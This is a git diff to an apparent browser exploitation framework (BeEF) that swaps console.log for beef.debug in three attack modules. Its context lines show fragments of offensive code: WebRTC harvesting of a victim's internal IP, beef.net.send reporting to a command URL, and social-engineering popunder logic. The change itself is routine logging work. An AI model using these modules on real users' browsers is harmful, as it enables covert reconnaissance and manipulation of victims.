diff --git a/modules/debug/test_get_variable/command.js b/modules/debug/test_get_variable/command.js index 8d4e6c2dd..e1160ac18 100644 --- a/modules/debug/test_get_variable/command.js +++ b/modules/debug/test_get_variable/command.js @@ -14,7 +14,7 @@ beef.execute(function() { var curl = "<%= @command_url %>"; var cid = "<%= @command_id %>"; - console.log("The current value of " + payload + " is " + Window[payload]); + beef.debug("The current value of " + payload + " is " + Window[payload]); beef.net.send(curl, parseInt(cid),'get_variable=true'); }); diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js index 572fa33db..ffdcd3403 100755 --- a/modules/host/get_internal_ip_webrtc/command.js +++ b/modules/host/get_internal_ip_webrtc/command.js @@ -23,7 +23,7 @@ beef.execute(function() { // Grep the SDP data for IP address data rtc.onicecandidate = function (evt) { if (evt.candidate){ - console.log("a="+evt.candidate.candidate); + beef.debug("a="+evt.candidate.candidate); grepSDP("a="+evt.candidate.candidate); } }; diff --git a/modules/social_engineering/ui_abuse_ie/command.js b/modules/social_engineering/ui_abuse_ie/command.js index d9be96466..e34a8666b 100644 --- a/modules/social_engineering/ui_abuse_ie/command.js +++ b/modules/social_engineering/ui_abuse_ie/command.js @@ -79,7 +79,7 @@ beef.execute(function() { // The keypress focus is on the popunder, but the following would be nice to have to force the victim to press TAB // var tab_pressed = false; // function checkTabPressed(){ -// console.log(event.keyCode); +// beef.debug(event.keyCode); // if(tab_pressed && event.keyCode != 9){ // // all good // }else if(event.keyCode == 9){